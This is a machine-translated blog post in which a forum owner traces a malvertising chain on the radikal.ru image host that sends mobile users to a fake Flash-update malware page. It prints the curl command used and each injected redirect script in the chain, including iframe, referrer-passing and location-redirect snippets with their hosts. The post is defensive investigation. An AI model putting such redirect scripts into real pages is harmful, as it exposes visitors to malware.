ラジカルからのウイルス。 また！

ストーリーはSMS「急いで行く」から始まり、サイトの所有者であるクライアントに書き込みました。 彼は特定のAlexander Goryachevから、サイトが感染している可能性が最も高いという手紙を受け取ったことが判明しました。



手紙の本文は次のとおりです。

こんにちは。



私の名前はAlexander Goryachevです。私はDoctor Webのアナリストです。



yarportal.ruフォームのこのトピックyarportal.ru/topic324608s0.htmlで画像を開くと、radikal.ruホスティングサイトから、ソフトウェア更新を装ってモバイルデバイス用のマルウェアを配布する詐欺サイトにリダイレクトされるという情報があります。 つまり、モバイルデバイス（電話、スマートフォン）を使用している場合、最初にradikal.ruページが目的の画像で開きますが、その後すぐに詐欺サイト（たとえば、newbrwzer.com /？a = u264w264z413x4u2w4x2t2v2y3u2x494q233c4y2b4w26413）にリダイレクトされます。 yarportal.ruの前面にある中間リンクなしで、ホスティング自体で直接画像を開くと、この動作は観察されません。 おそらくyarportal.ruがハッキングされたか、ポータルの所有者が知らない不公平な広告モデルを使用している可能性があります。



連絡先情報のうち、あなたの情報が最も適していたため、報告することにしました。 どういうわけか状況についてコメントし、この問題に取り組むことができますか？ 情報を提供していただければ幸いです。



ありがとう

このサイトはそれぞれかなり大きなフォーラムであり、ユーザーはどこにでも写真をアップロードし、写真ホスティングが表示する形式でそこにリンクを配置します。 悲しいかな、ラジカルは最も人気のあるものの一つです。



アナリストのアクションを繰り返して、モバイルデバイスに向かうトラフィックをスキャンしようとしました。 実際、この同じnewbrwzerへのリダイレクトが発生しますが、私たちのサイトがそれとどう関係しているのかは完全には明らかではありません。 トラフィックの分析により、ラジカル自体が次のような方法で悪意のあるリンクを提供することが示されました。

$ curl -s http://radikal.ru/F/s45.radikal.ru/i107/1205/76/593cc990c6ae.jpg.html | grep adv-port <script>document.write('<iframe border="0" marginwidth="0" marginheight="0" src="http://adv-port.com/view2.php?title='+document.title+'&referrer='+document.referrer+'&lang='+navigator.language+'"frameborder="0" height="120" scrolling="no" width="240"></iframe>');</script>
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

次に、これによりブラウザがフォームのページに送信されます。

 http://adv-port.com/view2.php?title=%D0%A0%D0%B0%D0%B4%D0%B8%D0%BA%D0%B0%D0%BB-%D0%A4%D0%BE%D1%82%D0%BE%20::%20%D0%A3%D0%B2%D0%B5%D0%BB%D0%B8%D1%87%D0%B5%D0%BD%D0%BD%D0%BE%D0%B5%20%D0%B8%D0%B7%D0%BE%D0%B1%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5&referrer=http://yarportal.ru/topic324608s0.html&lang=en
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

次のコードはどこにありますか？

 <script src="http://adv-port.com/ctr.php?ref='+document.referrer+'"></script>
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

次のコードは、 adv-port.com / ctr.php？ref = '+ document.referrer +'で入手できます。

 function error() { top.location='http://network-sitead.com/'; }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

このリンクには次のコードがあります。

 <script src='http://on-line-adv.com/2.php'></script>
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

このリンクをダウンロードすると、次の結果が得られます。

 document.location='http://newbrwzer.com/?a=u264w264z413x4u2w4x2t2v2y3u2x494q233c4y2b4w26413'
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

つまり 最終的に、ブラウザは実際にフラッシュプレーヤーを「更新」するというオファーのあるページに到達します。 少し後になって、一部のユーザーが実際に「更新」することが判明しました： yarportal.ru/topic332505.html



この「調査」の結果、3つの質問が生じます。

1. このような広告ポリシーで急進派はいつ死ぬのでしょうか？ これは、ウイルスがウイルスを介して拡散する最初のケースではありません。
2. Dr.Webは、wireshark / tcpdumpを介してトラフィックを気にしないアナリストをどこで取得しますか？
3. それとも、私が愚か者であり、サイトが本当に感染しているというだけですか？ :)

PS：アナリストは本当にDr.Webに関係しています。彼の記事はハブに関するものです habrahabr.ru/company/drweb/blog/142993 blog



UPD：過激派を使用しない-これは、もちろん、素晴らしいアイデアです。申し訳ありませんが、ユートピアに非常に近いです。 ウイルスがそこに定期的に現れる理由と、これらの同じ「更新」がさらに過激なhooの聴衆であるこのサイトから配信されている理由は、はるかに興味深いです）



UPD2：過激派に代わるものを提供する必要はありません。すでに知っています、ありがとう。